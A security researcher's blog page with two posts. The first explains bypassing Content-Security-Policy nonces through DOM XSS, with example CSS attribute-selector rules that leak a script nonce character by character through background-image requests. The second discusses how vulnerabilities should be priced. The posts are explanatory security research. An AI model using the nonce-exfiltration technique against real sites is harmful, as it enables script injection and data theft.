Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS 🎅

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I used to be really excited about it. My excitement was high enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (and to my knowledge this was the first working CSP implementation/prototype). It supported hashes, and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted, and indeed there were so many, that I didn't see an easy way to fix this. My heart was broken.💔

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016 a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out summarizing the problems highlighted by WHK and Mario after doing an internet-wide survey of CSP deployments, performed by Miki, Lukas, Sebastian and Artur. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral , I thought.

However, that was not it. The paper, in return, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern with them was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made it so that all dynamically generated script nodes would work by propagating the script nonces with it's dynamic resource filter. This made nonce propagation really simple. And so, this exact approach was proposed in the paper, and named strict-dynamic, now with user-agent support, rather than a runtime script as dominatrixss-csp was. Great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP, proposed to ignore whitelists completely, and rely solely on nonces. While the deployment of CSP nonces is harder than whitelists (as it requires server-side changes on every single page with the policy), it nevertheless seemed to propose real security benefits, which were clearly lacking on the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic of this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!

But this Christmas, as-if it was a piece of coal from Santa, Sebastian Lekies pointed out what in my opinion, seems to be a significant blow to CSP nonces, almost completely making CSP ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-years-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written now a days, and how that differs from 2002.

Before, most of the application logic lived in the server, but in the past decade it has been moving more and more to the client. Now a days, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This allows, among other things for making web applications offline-ready, and provides access to an endless supply of powerful web APIs.

And now, newly developed applications still have XSS, the difference is that since a lot of code is written in JavaScript, now they have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (non-exhaustive list, of course) of DOM XSS bugs that are common and CSP nonces alone can't defend against:
  1. Persistent DOM XSS when the attacker can force navigation to the vulnerable page, and the payload is not included in the cached response (so need to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (eg, fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (eg, https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I made a small presentation in Microsoft Bluehat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 on their 25c3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character-by-character, simply by generating HTTP requests every time a CSS selector matches, and repeating consecutively. If you haven't seen this working, take a look here. The way it works is very simple, it just creates a CSS attribute selector of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute.

The attack for script tags is very straightforward. We need to do the exact same attack, with the only caveat of making sure the script tag is set to display: block;.

So, we now can extract a CSP nonce using CSS and the only thing we need to do so is to be able to inject multiple times in the same document. The three examples of DOM XSS I gave you above permit exactly just that. A way to inject an XSS payload multiple times in the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is troubling in particular, because if in "the new world", developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean by that is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern allows you to control the way applications load progressively, it also makes it so that loading the same document twice can return different data each time.

Now, of course, the question is: How do you force the document to load twice!? With HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

A happy @slekies wishing you happy CSP holidays! Ho! ho! ho! ho!
Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example, let's take the default Guestbook example from the AppEngine getting started guide with a few modifications that add AJAX support, and CSP nonces. The application is simple enough and is vulnerable to an obvious XSS but it is mitigated by CSP nonces, or is it?

The application above has a very simple persistent XSS. Just submit a XSS payload (eg, <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you actually can't execute JavaScript because of the CSP nonce.

Now, let's do the attack, to recap, we will:

  1. with CSS attribute reader.
  2. with the CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the bruteforcing. You can find the code here, and you can run it by clicking the buttons above.

If all worked well, after clicking "Inject the XSS payload", you should have received an alert. Isn't that nice? =). In this case, the cache we are using is the BFCache since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness in CSP nonces. Sebastian demonstrated the same issue with postMessage. Another endpoint that is also problematic is XSS through HTTP "inclusion". This is a fairly common XSS vulnerability that simply consists on fetching some user-supplied URL and echoing it back in innerHTML. This is the equivalent of Remote File Inclusion for JavaScript. The exploit is exactly the same as the others.

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe the reason is because of IE quirks, but many websites have to use the location hash to implement history and navigation in a single-page JavaScript client. It even has a nickname "hashbang". In fact, this is so common that every single website that uses jQuery Mobile has this "feature" enabled by default, whether they like it or not.

Essentially, any website that uses hashbang for internal navigation is as vulnerable to reflected XSS as if CSP nonces weren't there to being with. How crazy is that! Take a look at the PoC here (Chrome Only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post.. but at least I hope you found it useful, and hopefully now you will be able to understand a bit better the real effectiveness of CSP, maybe learn a few browser tricks, and hopefully got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. It's coverage and effectiveness is even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up with CSP. 💩
I don't think we should give up.. but I also can't stop wondering whether all this effort we spend on CSP could be better used elsewhere - specially since this mechanism is so fragile it runs the real risk of creating an illusion of security where it does not exist. And I don-t think I'm alone in this assessment.. I guess time will tell.

Anyway, happy holidays, everyone! and thank you for reading. If you have any feedback, or comments please comment below or on Twitter!

Hasta luego!

Saturday, December 10, 2016

Vulnerability Pricing

What is the right price for a security vulnerability?

TL;DR: Vendors should focus on vulnerabilities, not on exploits. Vulnerabilities should be priced based on how difficult they are to find, not just on their exploitability.

I've been searching for an answer to this question for a while now. And this blog post is my attempt at answering it from my personal opinion.

The first answer is the economics from the security researchers perspective. Given that vendors do bug bounties as a way to interact with and give back to the security community, the rewards are mostly targeted towards compensating and showing appreciation. As a result, for these researchers, getting 5k USD for what they did over a few days as a research project or personal challenge is pretty neat.

In contrast, the "grey market" for those looking for vulnerabilities to exploit them (let's call them "exploiters"), the priorities are focused around the vulnerability reliability and stability.

As an "exploiter", you want good, simple, dumb, reliable bugs. For bug hunters, finding these *consistently* is difficult. It's not about giving yourself a challenge to find a bug in Chrome this month, but rather you seek to be able to create a pipeline of new bugs every month and if possible, even grow the pipeline over time. This is way more expensive than "bug hunting for fun".

Now, of course, there is an obvious profit opportunity here. Why not buy the bugs from those security researchers that find them in their spare time for fun, and resell them to "exploiters" for 10x the price? Well, that happens! Bug brokers do precisely that. So what happens is that then the prices from these "bug brokers" are just limited by how much the "exploiters" want to pay for them (which is a lot, more on that below).

However, and very importantly. We haven't discussed the cost of going from vulnerability to exploit. Depending on the vulnerability type, that might either be trivial (for some design/logic flaw issues) or very difficult (for some memory corruption issues).

Now, surprisingly, this key difference might give vendors a fighting chance. Software vendors in their mission to make their software better, actually don't care (or at least shouldn't care) about the difficulty to write a reliable exploit. Vendors want the vulnerability to fix it, learn from it, and find ways to prevent it from happening again.

This means that a software vendor should be able to get and find value from a vulnerability immediately, while if you wanted to make an exploit and sell it to those that want to exploit it, that would cost a significant amount of additional research and effort if there are a lot of mitigations along the way (sandboxes, isolation, etc).

So, it seems that the vendor's best chance in the "vendor" vs. "exploiter" competition is twofold: (1) to focus on making exploits harder and more expensive to write, and  (2) to focus on making vulnerabilities as profitable to find and to report as possible. With the goal that eventually the cost of "weaponizing" a vulnerability is higher than the cost for finding the next bug.

The second answer to this question is the economics from the "exploiters" and the vendors perspective.

For the vendors, software engineering is so imperfect that if you have a large application, you will have a lot of bugs and you will introduce more the more you code.

So for software vendors, learning of a lot of vulnerabilities isn't as valuable as preventing those many from happening in the first place. In other words, being notified of a vulnerability is not useful except if that knowledge is used to prevent the next one from happening.

Prices then (for vendors) should be, first of all, set to match the traffic these vendors can handle not just the response but the corresponding remediation work. So if the vendor has 2 full time engineers staffed to respond to security vulnerabilities, the prices should be set to approximately 2 full time engineers time.

And then, on top of that, as many engineering resources as possible should be focused on prevention (to make vulnerabilities harder to introduce), optimizing processes (to be able to handle a larger number of reports), and finally making exploits harder to write (to make finding the next bug cheaper than writing an exploit).

For the "exploiters", if they didn't have these vulnerabilities, their alternative would be to do dangerous and expensive human intelligence operations. Bribing, spying, interrogating, sabotaging etc.. all of these expensive and limited by the amount of people you can train, the amount of assets you can turn, and the amount of money they will ask for, and then your ability to keep all of this secret. Human intelligence is really very expensive.

On the other hand, they could use these security holes - super attractive capabilities that allow them to spy on those they want to spy on, reducing (or sometimes eliminating) the need for any of the human intelligence operations and their associated risks. How can it get better than that?

So they have the budget and ability to pay large sums of money. However, the vulnerability market isn't as efficient as it should be for the larger price to matter as much.

What the market inefficiency means is that if someone can make $X00,000 a year by just finding vulnerabilities (and ignoring the exploit writing), then the risk of spending a month or two writing a reliable exploit, it's at the cost of the lost opportunity on the would have been found vulnerabilities. And vendors could be able to take advantage of this opportunity.

In conclusion, it seems to me like the optimal way to price vulnerabilities for vendors is to do so based on:
(1) Identifying those vulnerabilities in the critical path of an exploit.
(2) Ignore mitigations as much as possible, for the purpose of vulnerability reward decisions.

And that will only have the intended effect if:
(a) Vendors have to have a proper investment in remediation, prevention and mitigation, as otherwise one doesn't get any value of buying these vulnerabilities.
(b) Our reliance on requiring full PoCs from security researchers will need to change if we want to get vulnerabilities to learn from them.

Thank you for reading, and please comment below or on Twitter if you disagree with anything or have any comments.